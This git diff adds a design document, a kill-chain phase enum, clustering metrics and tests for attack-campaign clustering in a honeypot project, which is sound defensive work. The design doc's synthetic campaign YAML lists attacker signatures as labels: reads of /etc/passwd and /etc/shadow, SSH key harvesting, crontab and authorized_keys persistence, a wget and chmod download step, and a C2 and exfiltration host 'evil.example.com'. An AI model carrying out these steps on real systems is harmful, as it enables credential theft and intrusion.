diff --git a/decnet/clustering/__init__.py b/decnet/clustering/__init__.py new file mode 100644 index 00000000..5974c84b --- /dev/null +++ b/decnet/clustering/__init__.py @@ -0,0 +1 @@ +"""Campaign clustering — see development/CAMPAIGN_CLUSTERING.md.""" diff --git a/decnet/clustering/ukc.py b/decnet/clustering/ukc.py new file mode 100644 index 00000000..0a54710d --- /dev/null +++ b/decnet/clustering/ukc.py @@ -0,0 +1,108 @@ +""" +Unified Kill Chain phase vocabulary (Pols, 2017). + +Used as the canonical phase enum for campaign clustering and (eventually) +the MITRE ATT&CK / TTPs-tagging worker. UKC tactic names map cleanly onto +ATT&CK tactics, so emitting these labels in synthetic data and runtime +phase inference avoids a renaming pass when TTP-tagging lands. + +A honeypot does not observe the entire chain. Pre-target phases (OSINT +reconnaissance, resource development, weaponization, social engineering) +happen before any decky is touched. The DSL allows the full enum so a +campaign spec can describe an end-to-end story; the synthetic generator +emits no events for unobservable phases. +""" +from __future__ import annotations + +from enum import Enum + + +class UKCPhase(str, Enum): + # In — initial foothold + RECONNAISSANCE = "reconnaissance" + RESOURCE_DEVELOPMENT = "resource_development" + WEAPONIZATION = "weaponization" + DELIVERY = "delivery" + SOCIAL_ENGINEERING = "social_engineering" + EXPLOITATION = "exploitation" + PERSISTENCE = "persistence" + DEFENSE_EVASION = "defense_evasion" + COMMAND_AND_CONTROL = "command_and_control" + # Through — network propagation + PIVOTING = "pivoting" + DISCOVERY = "discovery" + PRIVILEGE_ESCALATION = "privilege_escalation" + EXECUTION = "execution" + CREDENTIAL_ACCESS = "credential_access" + LATERAL_MOVEMENT = "lateral_movement" + # Out — action on objectives + COLLECTION = "collection" + EXFILTRATION = "exfiltration" + IMPACT = "impact" + OBJECTIVES = "objectives" + + +# Phases a honeypot can plausibly observe. Pre-target phases are excluded: +# OSINT recon, infrastructure-stand-up, payload authoring, and human-target +# manipulation all happen before the attacker touches a decky. The synthetic +# generator validates campaign specs against this set and warns (but does +# not error) on unobservable phases — a campaign can describe them; we just +# emit no events. +OBSERVABLE_PHASES: frozenset[UKCPhase] = frozenset({ + UKCPhase.DELIVERY, + UKCPhase.EXPLOITATION, + UKCPhase.PERSISTENCE, + UKCPhase.DEFENSE_EVASION, + UKCPhase.COMMAND_AND_CONTROL, + UKCPhase.PIVOTING, + UKCPhase.DISCOVERY, + UKCPhase.PRIVILEGE_ESCALATION, + UKCPhase.EXECUTION, + UKCPhase.CREDENTIAL_ACCESS, + UKCPhase.LATERAL_MOVEMENT, + UKCPhase.COLLECTION, + UKCPhase.EXFILTRATION, + UKCPhase.IMPACT, + UKCPhase.OBJECTIVES, +}) + + +# Stage groupings — useful for the multi_operator fixture (operators tend +# to split along the In / Through / Out boundary) and for downstream +# UI rendering of campaign timelines. +STAGE_IN: frozenset[UKCPhase] = frozenset({ + UKCPhase.RECONNAISSANCE, + UKCPhase.RESOURCE_DEVELOPMENT, + UKCPhase.WEAPONIZATION, + UKCPhase.DELIVERY, + UKCPhase.SOCIAL_ENGINEERING, + UKCPhase.EXPLOITATION, + UKCPhase.PERSISTENCE, + UKCPhase.DEFENSE_EVASION, + UKCPhase.COMMAND_AND_CONTROL, +}) + +STAGE_THROUGH: frozenset[UKCPhase] = frozenset({ + UKCPhase.PIVOTING, + UKCPhase.DISCOVERY, + UKCPhase.PRIVILEGE_ESCALATION, + UKCPhase.EXECUTION, + UKCPhase.CREDENTIAL_ACCESS, + UKCPhase.LATERAL_MOVEMENT, +}) + +STAGE_OUT: frozenset[UKCPhase] = frozenset({ + UKCPhase.COLLECTION, + UKCPhase.EXFILTRATION, + UKCPhase.IMPACT, + UKCPhase.OBJECTIVES, +}) + + +def stage_of(phase: UKCPhase) -> str: + """Return 'in' | 'through' | 'out' for a given phase.""" + if phase in STAGE_IN: + return "in" + if phase in STAGE_THROUGH: + return "through" + return "out" diff --git a/development/CAMPAIGN_CLUSTERING.md b/development/CAMPAIGN_CLUSTERING.md new file mode 100644 index 00000000..8d49cff0 --- /dev/null +++ b/development/CAMPAIGN_CLUSTERING.md @@ -0,0 +1,223 @@ +# Campaign Clustering — Design + +**Status:** pre-implementation. This doc is the spec; code follows. + +**Roadmap entry:** `DEVELOPMENT.md` — Detection & Intelligence → "Attack campaign clustering". + +## Premise + +A *campaign* is a coordinated set of attacker actions that share intent, tooling, or operator — observable at DECNET as recurring patterns across `attackers`, `sessions`, `fingerprints`, `credentials`, and `payloads`. + +We will not write clustering code until we can **simulate campaigns with ground-truth labels** and run a clusterer against those labels. The simulator is the specification for what a campaign is; the algorithm is replaceable. + +Order of work, strictly: + +1. Campaign DSL + generator (produces synthetic events with `campaign_id` / `actor_id` labels). +2. Adversarial scenario fixtures (the 6 below). +3. Metric harness (ARI + homogeneity + completeness + singleton recall). +4. Dumbest viable clusterer (connected components on a similarity graph). Must pass all 6 fixtures. +5. Pipeline integration (`decnet clusterer` worker, `campaigns` table, dashboard). +6. Replay tier — public datasets / Honeynet SSH logs through the live collector. Reality check, not optional forever. + +Steps 1–3 are the durable artifact. Step 4 is the first throwaway algorithm. + +--- + +## Phase Vocabulary: Unified Kill Chain + +Phase names use the **Unified Kill Chain** (Pols, 2017), 18 phases across 3 stages. UKC maps cleanly to MITRE ATT&CK tactics, which means the phase labels we emit in synthetic data are the same labels the future TTP-tagging worker (also in `DEVELOPMENT.md`) will produce. Fixtures become reusable across both features instead of needing renaming. + +| Stage | Phases | +|---|---| +| **In** (initial foothold) | Reconnaissance, Resource Development, Weaponization, Delivery, Social Engineering, Exploitation, Persistence, Defense Evasion, Command & Control | +| **Through** (network propagation) | Pivoting, Discovery, Privilege Escalation, Execution, Credential Access, Lateral Movement | +| **Out** (action on objectives) | Collection, Exfiltration, Impact, Objectives | + +**Honeypot observability.** A honeypot does not see the entire chain. Pre-target phases (OSINT Reconnaissance, Resource Development, Weaponization, Social Engineering) happen before any decky is touched. We observe roughly 14 of 18: + +- **In:** Delivery, Exploitation, Persistence, Defense Evasion, Command & Control +- **Through:** Pivoting, Discovery, Privilege Escalation, Execution, Credential Access, Lateral Movement +- **Out:** Collection, Exfiltration, Impact, Objectives + +The DSL allows the full enum so a campaign spec can describe an end-to-end story, but the generator emits no events for unobservable phases (and warns on them). MazeNET makes Pivoting and Lateral Movement first-class — that's where DECNET has *more* signal than a single-host honeypot, not less. + +Each phase carries default tool-signature templates the DSL can override per-campaign. Examples: + +- `discovery` → defaults: `whoami`, `id`, `uname -a`, `netstat -tnp`, `cat /etc/passwd` +- `persistence` → defaults: crontab edit, `~/.ssh/authorized_keys` write, systemd unit drop, `.bashrc` append +- `credential_access` → defaults: `/etc/shadow` read, browser-cred files, SSH key harvest +- `lateral_movement` → defaults: SSH/WinRM/SMB pivot to another decky in the same MazeNET segment + +--- + +## 1. Campaign DSL + +A campaign is a *causal story*, not a bag of events. Generator consumes YAML, emits a stream of synthetic records into the test DB with ground-truth labels. + +```yaml +campaign: + id: c-apt-fauxbear-01 + actors: + - id: a-001 + asn: 14061 # DigitalOcean + ip_pool: rotating # rotating | sticky | tor + ja3: 769,4865-... # tool fingerprint, shared within campaign + hassh: aae6b9... + hours_active_utc: [22, 23, 0, 1, 2, 3] + jitter_seconds: 90 + role: intrusion # intrusion | post-exploit | exfil — for multi-operator campaigns + - id: a-002 + asn: 14061 + ip_pool: sticky + ja3: 769,4865-... # same tool, different operator + hassh: aae6b9... + hours_active_utc: [14, 15, 16, 17] + jitter_seconds: 30 + role: post-exploit + phases: # UKC phase enum + - name: delivery + actor: a-001 + tool_signature: { user_agent: "Mozilla/5.0 (compatible; Nmap)" } + target_selector: { service: any, count: 50 } + dwell_seconds: 1 + - name: exploitation + actor: a-001 + tool_signature: { payload_hash: deadbeef..., cve: CVE-2024-XXXX } + target_selector: { service: http, port: 8080 } + success_rate: 0.2 + - name: persistence + actor: a-001 + tool_signature: { commands: ["wget", "chmod +x", "./", "crontab -e"] } + target_selector: { decky: previous_success } + - name: command_and_control + actor: a-001 + tool_signature: { c2_callback: evil.example.com, beacon_jitter_seconds: 30 } + - name: discovery + actor: a-002 # handoff to second operator + tool_signature: { commands: ["whoami", "id", "uname -a", "ip route", "arp -a"] } + - name: lateral_movement + actor: a-002 + tool_signature: { protocol: ssh, credential_source: harvested } + target_selector: { decky: adjacent_in_mazenet } + - name: collection + actor: a-002 + tool_signature: { paths: ["/var/lib/mysql/*", "/home/*/Documents/*"] } + - name: exfiltration + actor: a-002 + tool_signature: { c2_callback: evil.example.com, payload_hash: deadbeef... } + duration_days: 7 + pause_windows: [] # for the "campaign that pauses" scenario +``` + +**Generator contract:** + +- Input: list of campaign YAMLs + `noise: { scanner_count, ratio }`. +- Output: rows in `attackers` / `sessions` / `fingerprints` / `credentials_attempts` / `payloads`, each tagged with a `_truth_campaign_id` and `_truth_actor_id` column (test-only, stripped before clustering runs). +- Deterministic given a seed. +- Validates phase names against the UKC enum; warns on unobservable phases (emits no events for them). + +The generator lives at `tests/factories/campaign_factory.py`. The DSL parser is the spec; if a real attacker pattern can't be expressed in it, the DSL is incomplete and we extend it before extending the clusterer. + +--- + +## 2. Adversarial Scenario Fixtures + +Six fixtures. Each is a YAML file under `tests/fixtures/campaigns/` plus an expected-bounds file. CI runs the clusterer against all six; any regression fails the build. + +| # | Name | Setup | Pass condition | +|---|---|---|---| +| 1 | `shared_wordlist` | 2 distinct campaigns, both use rockyou-top1k for SSH brute (Credential Access phase) | Must NOT merge — credential overlap alone is insufficient signal | +| 2 | `vpn_hopping` | 1 campaign, 1 actor, IPs rotate across 5 ASNs over 3 days, JA3/HASSH stable, full Delivery→C2→Discovery chain | Must NOT split — actor identity survives IP churn | +| 3 | `lone_wolf` | 1 opportunistic scanner, Delivery phase only, no follow-up, no shared signals | Must stay singleton — not absorbed into any campaign | +| 4 | `paused_campaign` | 1 campaign, active days 1–2 (Delivery, Exploitation), silent days 3–5, active days 6–7 (Discovery, Lateral Movement, Exfiltration) | Must NOT split into two campaigns — temporal window must accommodate operator pauses | +| 5 | `multi_operator` | 1 campaign, 2 actors with distinct UKC roles: actor A handles Delivery→Exploitation→Persistence→C2 on UTC night shift, actor B handles Discovery→Lateral Movement→Collection→Exfiltration on UTC day shift, different IPs/ASNs, shared C2 callback + payload hash | Must merge — shared tooling and phase handoff > diverged infra | +| 6 | `noise_floor` | All 5 above + 10× random Delivery-only scanners drawn from a noise distribution | All 5 must still resolve correctly; scanners stay singleton | + +Fixture 5 is the load-bearing one for UKC: a real campaign frequently splits operators along the In/Through/Out boundary, and a clusterer that only looks at IP/ASN will miss it. Phase-handoff is itself a feature the algorithm can use. + +**Bounds per fixture** (in `expected.yaml` next to each): + +```yaml +adjusted_rand_index: { min: 0.85 } +homogeneity: { min: 0.90 } # no false merges +completeness: { min: 0.80 } # no false splits +singleton_recall: { min: 0.95 } # for lone_wolf / noise scanners +``` + +Bounds are deliberately loose at first — we ratchet them up as the algorithm improves. Loosening a bound to make CI pass requires a PR comment justifying it. + +--- + +## 3. Metric Harness + +`tests/clustering/metrics.py`. Decided **before** any algorithm exists, so we don't pick the metric that flatters the result. + +- **Adjusted Rand Index** — headline. Compares predicted vs. truth labels, corrects for chance. +- **Homogeneity** — each predicted cluster contains only members of one true campaign. Catches false merges. +- **Completeness** — all members of a true campaign land in the same predicted cluster. Catches false splits. +- **Singleton recall** — fraction of true singletons (lone wolves, noise) that stay singleton. + +Homogeneity and completeness trade off; both must be reported. A single number hides which direction the algorithm is failing. + +**Per-fixture report** is dumped as JSON on every CI run, not just pass/fail, so we can watch trends over time. + +--- + +## 4. First Algorithm (after 1–3 are green) + +Connected-components on a similarity graph. No ML. + +- Nodes: attackers (or sessions, TBD — see open questions). +- Edges: weighted similarity, threshold to binarize. +- Edge weight = sum of: + - JA3/JA4/HASSH exact match: high + - Payload hash exact match: high + - C2 callback domain/IP exact match: high + - **Phase-handoff signal:** actor X ends in C2/Persistence on a decky, actor Y begins Discovery/Lateral Movement on the same decky within window W: medium-high. Defeats fixture 5 even when IP/ASN diverge. + - Credential-list Jaccard: low (defeated by fixture 1) + - Command-sequence Jaccard, bucketed by UKC phase: medium + - Temporal proximity (within window W): low multiplier + - ASN match: very low +- Edge threshold and feature weights are config, tuned against the 6 fixtures. + +If connected-components passes all 6, ship it. DBSCAN/HDBSCAN/graph-community algorithms are deferred until a fixture proves CC inadequate. + +--- + +## 5. Pipeline Integration + +- New worker: `decnet clusterer`. Bus consumer on `attacker.scored` and `attacker.observed`. +- Re-cluster strategy: incremental on new attacker arrivals, full re-cluster nightly. +- Storage: `campaigns` table (UUID PK, per the `feedback_uuid_over_natural_keys` rule); `attackers.campaign_id` FK nullable. +- Bus signal: `campaign.{id}.formed` / `campaign.{id}.updated`. Document in `wiki-checkout/Service-Bus.md` per the `feedback_wiki_bus_signals` rule. +- Dashboard: Campaigns list page + CampaignDetail (aggregated AttackerDetail, with a UKC phase timeline visualization showing which phases each actor in the campaign executed). + +--- + +## 6. Replay Tier (post-v1) + +Public-dataset replay through the real collector. Confirms our fixtures encode realistic patterns, not just our assumptions. + +Candidate sources: +- Honeynet Project SSH session corpora. +- DShield daily summaries. +- Our own production data once it accumulates. + +This is where we discover whether the DSL is missing a dimension. Schedule it; don't punt forever. + +--- + +## Risks + +1. **Simulator encodes our assumptions.** Real attackers may not match. Mitigation: replay tier (§6). +2. **Bound creep.** Loosening fixture bounds to ship is the failure mode. Mitigation: bound changes require PR justification. +3. **Feature drift.** Sniffer fingerprint coverage changes the available signal. Mitigation: feature set is configurable; fixtures regenerate from the DSL when features change. +4. **UKC phase inference accuracy.** The clusterer relies on phase labels per session — those have to come from somewhere. Pre-TTP-tagging worker, the DSL emits them as ground truth in synthetic data, and the live pipeline uses heuristic phase assignment (command keywords, port/protocol). This is a known approximation; tightens once the TTP-tagging worker ships. +5. **Cost of full re-cluster.** At fleet scale, nightly re-cluster on millions of attackers is expensive. Mitigation: incremental-first, full nightly is a fallback we may drop. + +## Open questions + +- **Cluster nodes: attackers or sessions?** Leaning attackers (already deduped by `attacker_uuid`), but session-level may catch campaigns that span multiple attacker identities. Decide after fixture 5 (`multi_operator`). +- **Time window W** for temporal-proximity and phase-handoff edges: 24h? 7d? Tuned against fixture 4 (`paused_campaign`). +- **Phase inference at runtime.** Do we ship a heuristic phase classifier alongside the clusterer, or block on the TTP-tagging worker landing first? Heuristic is faster but is technical debt against the future ATT&CK-tagged version. +- **API exposure.** Do we expose campaigns in the public API or admin-only at first? Admin-only until we have UI for false-positive correction. diff --git a/development/DEVELOPMENT_V2.md b/development/DEVELOPMENT_V2.md index 58b1638e..dfaafabe 100644 --- a/development/DEVELOPMENT_V2.md +++ b/development/DEVELOPMENT_V2.md @@ -546,6 +546,12 @@ push-only covers it. --- +## Campaign Clustering — DSL Evolution + +The DSL currently models campaigns as linear phase sequences with clear actor assignments. Real campaigns are messier — phases overlap, actors share responsibilities, tool signatures drift over time. The fixtures don't test for overlapping phases or ambiguous actor assignments. That's probably fine for v1 — the six fixtures cover the known failure modes — but the replay tier will reveal whether you need to add fixtures for phase overlap or role ambiguity. The DSL has a natural extension path: concurrent phases, multi-actor per phase, probabilistic phase ordering. You don't need it now, but the design doesn't block it. + +--- + ## Threat Intel Enrichment — Provider Backlog Long list of candidate sources for `decnet/intel/`. Open / free-tier diff --git a/tests/clustering/__init__.py b/tests/clustering/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/tests/clustering/metrics.py b/tests/clustering/metrics.py new file mode 100644 index 00000000..eab69256 --- /dev/null +++ b/tests/clustering/metrics.py @@ -0,0 +1,179 @@ +""" +Clustering metric harness — see development/CAMPAIGN_CLUSTERING.md §3. + +Decided BEFORE any clustering algorithm exists, on purpose: if the +metrics get picked after seeing results, they'll flatter whatever the +algorithm happens to produce. + +Four metrics, none on its own sufficient: + + * Adjusted Rand Index — headline number, chance-corrected agreement + between predicted clusters and ground truth. + * Homogeneity — each predicted cluster contains only one true class. + Catches FALSE MERGES (campaigns wrongly fused). + * Completeness — every member of a true class lands in the same + predicted cluster. Catches FALSE SPLITS (one campaign wrongly torn + apart). + * Singleton recall — fraction of ground-truth singletons (lone wolves, + background noise) that are kept singleton by the clusterer. + +Implemented from first principles in pure Python so the test harness +doesn't pull sklearn/numpy into the runtime dependency surface. +""" +from __future__ import annotations + +import math +from collections import Counter, defaultdict + + +def _comb2(n: int) -> int: + """C(n, 2) — number of unordered pairs from n items.""" + return n * (n - 1) // 2 if n >= 2 else 0 + + +def adjusted_rand_index(truth: dict[str, str], pred: dict[str, str]) -> float: + """ + Adjusted Rand Index between two clusterings over the same item set. + + Range: typically [0, 1]; can dip negative for worse-than-random + labelings. 1.0 = identical partitions (up to label renaming), + 0.0 ≈ chance agreement. + + Both args map item_id -> cluster_id. Items must align exactly. + """ + if set(truth) != set(pred): + raise ValueError( + "ARI requires identical item sets in truth and pred " + f"(missing in pred: {set(truth) - set(pred)}, " + f"missing in truth: {set(pred) - set(truth)})" + ) + n = len(truth) + if n < 2: + return 1.0 # trivially "agree" on <2 items + + # Build the contingency table n_ij = |cluster_i ∩ class_j|. + contingency: dict[tuple[str, str], int] = defaultdict(int) + for item, t_label in truth.items(): + p_label = pred[item] + contingency[(p_label, t_label)] += 1 + + sum_comb = sum(_comb2(v) for v in contingency.values()) + a_counts = Counter(pred.values()) # row sums (predicted clusters) + b_counts = Counter(truth.values()) # column sums (true classes) + sum_a = sum(_comb2(v) for v in a_counts.values()) + sum_b = sum(_comb2(v) for v in b_counts.values()) + total_pairs = _comb2(n) + + expected = (sum_a * sum_b) / total_pairs if total_pairs else 0.0 + max_index = (sum_a + sum_b) / 2 + if max_index == expected: + # Degenerate: both clusterings are trivially equal in structure + # (both all-singletons, or both one-big-cluster). The math forces + # this — see the algebra of max_index = expected. The induced + # partitions are necessarily identical, so ARI is 1.0. (sklearn + # adopts the same convention.) + return 1.0 + return (sum_comb - expected) / (max_index - expected) + + +def _entropy(counts: list[int], total: int) -> float: + if total == 0: + return 0.0 + h = 0.0 + for c in counts: + if c == 0: + continue + p = c / total + h -= p * math.log(p) + return h + + +def _conditional_entropy( + contingency: dict[tuple[str, str], int], + given_counts: dict[str, int], + total: int, +) -> float: + """H(rows | cols) — i.e. entropy of class within each cluster.""" + if total == 0: + return 0.0 + h = 0.0 + by_col: dict[str, list[int]] = defaultdict(list) + for (row, col), v in contingency.items(): + by_col[col].append(v) + for col, vs in by_col.items(): + col_total = given_counts[col] + if col_total == 0: + continue + col_entropy = _entropy(vs, col_total) + h += (col_total / total) * col_entropy + return h + + +def homogeneity(truth: dict[str, str], pred: dict[str, str]) -> float: + """ + 1 - H(truth | pred) / H(truth). 1.0 = each predicted cluster + contains only members of a single true class (no false merges). + """ + n = len(truth) + if n == 0: + return 1.0 + contingency: dict[tuple[str, str], int] = defaultdict(int) + for item, t in truth.items(): + contingency[(t, pred[item])] += 1 + truth_counts = Counter(truth.values()) + pred_counts = Counter(pred.values()) + h_truth = _entropy(list(truth_counts.values()), n) + if h_truth == 0: + return 1.0 + h_truth_given_pred = _conditional_entropy(contingency, dict(pred_counts), n) + return 1.0 - (h_truth_given_pred / h_truth) + + +def completeness(truth: dict[str, str], pred: dict[str, str]) -> float: + """ + 1 - H(pred | truth) / H(pred). 1.0 = all members of each true class + are assigned to the same predicted cluster (no false splits). + """ + n = len(truth) + if n == 0: + return 1.0 + contingency: dict[tuple[str, str], int] = defaultdict(int) + for item, t in truth.items(): + contingency[(pred[item], t)] += 1 + pred_counts = Counter(pred.values()) + truth_counts = Counter(truth.values()) + h_pred = _entropy(list(pred_counts.values()), n) + if h_pred == 0: + return 1.0 + h_pred_given_truth = _conditional_entropy(contingency, dict(truth_counts), n) + return 1.0 - (h_pred_given_truth / h_pred) + + +def singleton_recall(truth: dict[str, str], pred: dict[str, str]) -> float: + """ + Fraction of ground-truth singletons that the clusterer kept singleton. + + A "true singleton" is an item whose truth-campaign has exactly one + member (lone wolves, background noise scanners). The metric exists + because ARI/homogeneity/completeness all dilute the cost of a + clusterer that absorbs noise into real campaigns — and noise + absorption is the failure mode that makes campaign attribution + useless in practice. + """ + truth_counts = Counter(truth.values()) + true_singletons = [item for item, t in truth.items() if truth_counts[t] == 1] + if not true_singletons: + return 1.0 + pred_counts = Counter(pred.values()) + kept = sum(1 for item in true_singletons if pred_counts[pred[item]] == 1) + return kept / len(true_singletons) + + +def score(truth: dict[str, str], pred: dict[str, str]) -> dict[str, float]: + """One-shot bundle the four metrics for fixture reports.""" + return { + "adjusted_rand_index": adjusted_rand_index(truth, pred), + "homogeneity": homogeneity(truth, pred), + "completeness": completeness(truth, pred), + "singleton_recall": singleton_recall(truth, pred), + } diff --git a/tests/clustering/test_campaign_factory.py b/tests/clustering/test_campaign_factory.py new file mode 100644 index 00000000..2782dbe4 --- /dev/null +++ b/tests/clustering/test_campaign_factory.py @@ -0,0 +1,112 @@ +"""Determinism + DSL-validation tests for the synthetic campaign factory.""" +from __future__ import annotations + +import pytest + +from decnet.clustering.ukc import UKCPhase +from tests.factories.campaign_factory import ( + DSLValidationError, + generate, +) + + +def _minimal_spec() -> dict: + return { + "campaign": { + "id": "c-test", + "actors": [{"id": "a-1", "asn": 64512}], + "phases": [{"name": "delivery", "actor": "a-1"}], + "duration_days": 1, + } + } + + +def test_generation_is_deterministic_given_seed() -> None: + spec = _minimal_spec() + a = generate(spec, seed=42) + b = generate(spec, seed=42) + # IDs are RNG-driven — same seed must produce identical IDs, not + # merely identical structure. Otherwise federation gossip and + # fixture diffing both break. + assert [att.attacker_id for att in a.attackers] == [ + att.attacker_id for att in b.attackers + ] + assert [s.session_id for s in a.sessions] == [s.session_id for s in b.sessions] + + +def test_different_seeds_produce_different_ids() -> None: + spec = _minimal_spec() + a = generate(spec, seed=1) + b = generate(spec, seed=2) + assert a.attackers[0].attacker_id != b.attackers[0].attacker_id + + +def test_truth_labels_match_dsl() -> None: + spec = _minimal_spec() + corpus = generate(spec, seed=0) + assert corpus.attackers[0].truth_campaign_id == "c-test" + assert corpus.attackers[0].truth_actor_id == "a-1" + # truth_labels() returns the dict the metric harness consumes. + labels = corpus.truth_labels() + assert labels[corpus.attackers[0].attacker_id] == "c-test" + + +def test_unobservable_phase_emits_no_events() -> None: + spec = _minimal_spec() + spec["campaign"]["phases"] = [ + {"name": "reconnaissance", "actor": "a-1"}, # pre-target, unobservable + {"name": "delivery", "actor": "a-1"}, + ] + corpus = generate(spec, seed=0) + # Only the delivery phase should produce sessions. + assert all(s.phase == UKCPhase.DELIVERY for s in corpus.sessions) + assert len(corpus.sessions) == 1 + + +def test_unknown_phase_name_raises() -> None: + spec = _minimal_spec() + spec["campaign"]["phases"] = [{"name": "make_coffee", "actor": "a-1"}] + with pytest.raises(DSLValidationError, match="unknown UKC phase"): + generate(spec, seed=0) + + +def test_phase_referencing_unknown_actor_raises() -> None: + spec = _minimal_spec() + spec["campaign"]["phases"] = [{"name": "delivery", "actor": "ghost"}] + with pytest.raises(DSLValidationError, match="unknown actor"): + generate(spec, seed=0) + + +def test_noise_scanners_are_truth_singletons() -> None: + spec = { + "corpus": { + "campaigns": [_minimal_spec()], + "noise": {"scanner_count": 5}, + } + } + corpus = generate(spec, seed=0) + # 1 campaign actor + 5 noise scanners = 6 distinct truth campaigns. + truth_campaigns = {a.truth_campaign_id for a in corpus.attackers} + assert len(truth_campaigns) == 6 + + +def test_multi_actor_campaign_shares_campaign_id() -> None: + spec = { + "campaign": { + "id": "c-shared", + "actors": [ + {"id": "a-1", "asn": 14061}, + {"id": "a-2", "asn": 14061}, + ], + "phases": [ + {"name": "delivery", "actor": "a-1"}, + {"name": "discovery", "actor": "a-2"}, + ], + "duration_days": 1, + } + } + corpus = generate(spec, seed=0) + truth = corpus.truth_labels() + # Both attacker rows must point to the SAME truth_campaign_id — + # this is the property fixture 5 (multi_operator) hinges on. + assert set(truth.values()) == {"c-shared"} diff --git a/tests/clustering/test_lone_wolf_fixture.py b/tests/clustering/test_lone_wolf_fixture.py new file mode 100644 index 00000000..b2126a23 --- /dev/null +++ b/tests/clustering/test_lone_wolf_fixture.py @@ -0,0 +1,92 @@ +""" +End-to-end pipeline test for fixture 3 (lone_wolf). + +Loads the YAML spec, runs the synthetic generator, applies a placeholder +identity clusterer (each attacker → its own cluster), scores against +the expected bounds. This is the simplest of the six fixtures and is +deliberately the first one wired up — its ground truth is all +singletons, so an identity clusterer trivially passes, which proves the +DSL→factory→metrics pipeline works before any real algorithm is built. + +Once the connected-components clusterer (CAMPAIGN_CLUSTERING.md §4) +lands, this test will swap the placeholder for the real implementation +and the same fixture must continue to pass. +""" +from __future__ import annotations + +from pathlib import Path + +import pytest +import yaml + +from tests.clustering.metrics import score +from tests.factories.campaign_factory import GeneratedCorpus, generate, load_yaml + +FIXTURE_DIR = Path(__file__).parent.parent / "fixtures" / "campaigns" + + +def _identity_clusterer(corpus: GeneratedCorpus) -> dict[str, str]: + """Every attacker is its own cluster. Trivially correct on lone_wolf.""" + return {a.attacker_id: f"cluster-{a.attacker_id}" for a in corpus.attackers} + + +def test_lone_wolf_pipeline_passes_bounds() -> None: + spec = load_yaml(FIXTURE_DIR / "lone_wolf.yaml") + bounds = yaml.safe_load((FIXTURE_DIR / "lone_wolf.expected.yaml").read_text()) + + corpus = generate(spec, seed=0) + truth = corpus.truth_labels() + pred = _identity_clusterer(corpus) + metrics = score(truth, pred) + + failures = [] + for name, bound in bounds.items(): + observed = metrics[name] + if observed < bound["min"]: + failures.append(f"{name}={observed:.3f} < min {bound['min']:.3f}") + assert not failures, "fixture bounds violated: " + "; ".join(failures) + + +def test_lone_wolf_corpus_shape() -> None: + """Sanity: 1 wolf + 8 noise scanners = 9 attackers, 9 sessions.""" + spec = load_yaml(FIXTURE_DIR / "lone_wolf.yaml") + corpus = generate(spec, seed=0) + assert len(corpus.attackers) == 9 + assert len(corpus.sessions) == 9 + # Every attacker is a truth-singleton (its own campaign). + truth_campaigns = {a.truth_campaign_id for a in corpus.attackers} + assert len(truth_campaigns) == 9 + + +def test_identity_clusterer_fails_on_a_real_campaign() -> None: + """ + Sanity for the harness, NOT a test of the clusterer: a real + multi-actor campaign should make the placeholder identity clusterer + fail completeness, since each truth-campaign gets fragmented into + one-member clusters. If this didn't fail, our metrics would be + blind to false splits — and that's the entire point of fixture 4 + and 5 in the design doc. + """ + spec = { + "campaign": { + "id": "c-real", + "actors": [ + {"id": "a-1", "asn": 14061}, + {"id": "a-2", "asn": 14061}, + ], + "phases": [ + {"name": "delivery", "actor": "a-1"}, + {"name": "discovery", "actor": "a-2"}, + ], + "duration_days": 1, + } + } + corpus = generate(spec, seed=0) + truth = corpus.truth_labels() + pred = _identity_clusterer(corpus) + metrics = score(truth, pred) + # Identity clusterer splits the one true campaign across 2 clusters + # → completeness drops below 1.0. This must hold or our metrics + # aren't catching what they're supposed to catch. + assert metrics["completeness"] < 1.0 + assert metrics["homogeneity"] == pytest.approx(1.0) # no false merges, just splits diff --git a/tests/clustering/test_metrics.py b/tests/clustering/test_metrics.py new file mode 100644 index 00000000..385d2de8 --- /dev/null +++ b/tests/clustering/test_metrics.py @@ -0,0 +1,76 @@ +"""Sanity tests for the clustering metric harness.""" +from __future__ import annotations + +import pytest + +from tests.clustering.metrics import ( + adjusted_rand_index, + completeness, + homogeneity, + score, + singleton_recall, +) + + +def test_perfect_agreement_scores_one() -> None: + truth = {"a": "C1", "b": "C1", "c": "C2", "d": "C2"} + # Same partition, different label names — clustering doesn't preserve + # names, so renamed-but-isomorphic must still score 1.0. + pred = {"a": "X", "b": "X", "c": "Y", "d": "Y"} + s = score(truth, pred) + assert s["adjusted_rand_index"] == pytest.approx(1.0) + assert s["homogeneity"] == pytest.approx(1.0) + assert s["completeness"] == pytest.approx(1.0) + assert s["singleton_recall"] == pytest.approx(1.0) + + +def test_all_singletons_perfect() -> None: + truth = {"a": "A", "b": "B", "c": "C"} + pred = {"a": "1", "b": "2", "c": "3"} + s = score(truth, pred) + assert s["singleton_recall"] == pytest.approx(1.0) + assert s["adjusted_rand_index"] == pytest.approx(1.0) + + +def test_false_merge_drops_homogeneity() -> None: + truth = {"a": "C1", "b": "C2"} + pred = {"a": "X", "b": "X"} # merged two distinct campaigns + assert homogeneity(truth, pred) == pytest.approx(0.0) + # Completeness is fine (each true class lives in one cluster). + assert completeness(truth, pred) == pytest.approx(1.0) + + +def test_false_split_drops_completeness() -> None: + truth = {"a": "C1", "b": "C1"} + pred = {"a": "X", "b": "Y"} # split one campaign into two clusters + assert completeness(truth, pred) == pytest.approx(0.0) + assert homogeneity(truth, pred) == pytest.approx(1.0) + + +def test_singleton_recall_penalises_noise_absorption() -> None: + # 3 lone wolves + 1 real campaign with 2 members. + truth = {"w1": "wolf1", "w2": "wolf2", "w3": "wolf3", "c1": "C", "c2": "C"} + # Clusterer absorbs all wolves into the campaign. + pred = dict.fromkeys(truth, "BIG") + assert singleton_recall(truth, pred) == pytest.approx(0.0) + # And a clusterer that keeps wolves singleton should score 1.0 + # on this metric, regardless of what it does with the campaign. + pred_ok = {"w1": "1", "w2": "2", "w3": "3", "c1": "C", "c2": "C"} + assert singleton_recall(truth, pred_ok) == pytest.approx(1.0) + + +def test_mismatched_item_sets_raises() -> None: + with pytest.raises(ValueError): + adjusted_rand_index({"a": "X"}, {"b": "Y"}) + + +def test_random_labels_low_ari() -> None: + # ARI of an arbitrary partition vs. ground truth should be near 0, + # not near 1 — this is the chance-correction guarantee. + truth = {f"i{n}": f"C{n // 4}" for n in range(20)} + # Pred that ignores truth: just shuffles items into 5 buckets in + # an order uncorrelated with truth. + pred = {f"i{n}": f"X{(n * 7) % 5}" for n in range(20)} + ari = adjusted_rand_index(truth, pred) + # Loose bound — the point is "much closer to 0 than to 1". + assert ari < 0.3 diff 